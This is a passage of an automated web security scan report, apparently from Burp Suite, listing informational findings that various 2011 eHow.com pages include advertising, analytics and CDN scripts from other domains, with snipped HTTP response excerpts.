<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Prevent Chimney Fires | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_7856914_prevent-chimney-fires.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.488. http://www.ehow.com/how_9191_program-rca-universal.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_9191_program-rca-universal.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83389

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Program an RCA Universal Remote Control |
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_9191_program-rca-universal.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.489. http://www.ehow.com/internet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/internet/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72629

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Internet - How To Information | eHow.com</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.490. http://www.ehow.com/job-search-and-employment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/job-search-and-employment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72416

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Job Search & Employment - How To Information | eH
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.491. http://www.ehow.com/lawn-and-garden/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/lawn-and-garden/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71020

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Lawn & Garden - How To Information | eHow.com</ti
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.492. http://www.ehow.com/legal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/legal/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73407

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Legal - How To Information | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.493. http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/list_6515049_common-english-grammar-mistakes.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:28 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73581

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Common English Grammar Mistakes | eHow.com</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-eEZudw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.494. http://www.ehow.com/list_7189463_grammar-check-tools.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/list_7189463_grammar-check-tools.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73786

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Grammar Check Tools | eHow.com</title>
       <meta c
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-eEZudw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.495. http://www.ehow.com/lose-weight/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/lose-weight/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://ui.ehowcdn.com/content/compressed/en-US/subscriptions-7JpeWA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59067

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Lose Weight - How To Information | eHow.com</titl
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/category-642Ubw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/subscriptions-7JpeWA.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.496. http://www.ehow.com/members.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/members.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45911

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Members | eHow.com</title>
       <meta charset="UTF-
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.497. http://www.ehow.com/mental-health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/mental-health/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70439

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Mental Health - How To Information | eHow.com</ti
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.498. http://www.ehow.com/music/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/music/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70511

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Music - How To Information | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.499. http://www.ehow.com/parenting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/parenting/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70918

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Parenting - How To Information | eHow.com</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.500. http://www.ehow.com/personal-finance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/personal-finance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72591

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Personal Finance - How To Information | eHow.com<
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.501. http://www.ehow.com/pets-and-animals/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/pets-and-animals/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73338

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Pets & Animals - How To Information | eHow.com</t
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.502. http://www.ehow.com/photos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/photos/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69202

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Photos - eHow.com</title>
       <meta charset="UTF-8
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/topic-v2-4LSRhA.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.503. http://www.ehow.com/plant-care/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/plant-care/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:19 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70205

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Plant Care - How To Information | eHow.com</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.504. http://www.ehow.com/plants/ previous next

Summary

Severity:	Information
Confidence:	Certain
